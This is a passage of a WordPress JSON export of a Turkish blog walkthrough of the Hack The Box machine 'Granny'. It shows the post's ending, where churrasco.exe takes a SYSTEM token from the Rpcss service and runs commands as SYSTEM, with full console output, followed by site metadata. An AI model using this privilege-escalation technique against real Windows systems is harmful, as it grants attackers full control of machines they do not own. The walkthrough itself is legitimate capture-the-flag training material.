run&quot;\nC:\\WINDOWS\\TEMP\n\nC:\\WINDOWS\\Temp&gt;whoami\nwhoami\nnt authority\\network service\n\nC:\\WINDOWS\\Temp&gt;churrasco.exe -d &quot;whoami&quot;\nchurrasco.exe -d &quot;whoami&quot;\n\/churrasco\/--&gt;Current User: NETWORK SERVICE \n\/churrasco\/--&gt;Getting Rpcss PID ...\n\/churrasco\/--&gt;Found Rpcss PID: 680 \n\/churrasco\/--&gt;Searching for Rpcss threads ...\n\/churrasco\/--&gt;Found Thread: 684 \n\/churrasco\/--&gt;Thread not impersonating, looking for another thread...\n\/churrasco\/--&gt;Found Thread: 688 \n\/churrasco\/--&gt;Thread not impersonating, looking for another thread...\n\/churrasco\/--&gt;Found Thread: 696 \n\/churrasco\/--&gt;Thread impersonating, got NETWORK SERVICE Token: 0x730\n\/churrasco\/--&gt;Getting SYSTEM token from Rpcss Service...\n\/churrasco\/--&gt;Found SYSTEM token 0x728\n\/churrasco\/--&gt;Running command with SYSTEM Token...\n\/churrasco\/--&gt;Done, command should have ran as SYSTEM!\nnt authority\\system\n<\/code><\/pre>\n<p>Not: MSFCONSOLE ile 2dk.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Granny &#8211; HTB Kolay Windows Walkthrough Nmap taramas\u0131 ile ba\u015flayal\u0131m. Starting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-30 04:19 EDT&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/30\/granny\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Granny<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498,468],"tags":[585,586,510],"class_list":["post-1439","post","type-post","status-publish","format-standard","hentry","category-walkthrough","category-windows","tag-churrasco-exe","tag-move","tag-put","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1439","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1439"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1439\/revisions"}],"predecessor-version":[{"id":1440,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1439\/revisions\/1440"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1439"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1439"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1439"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}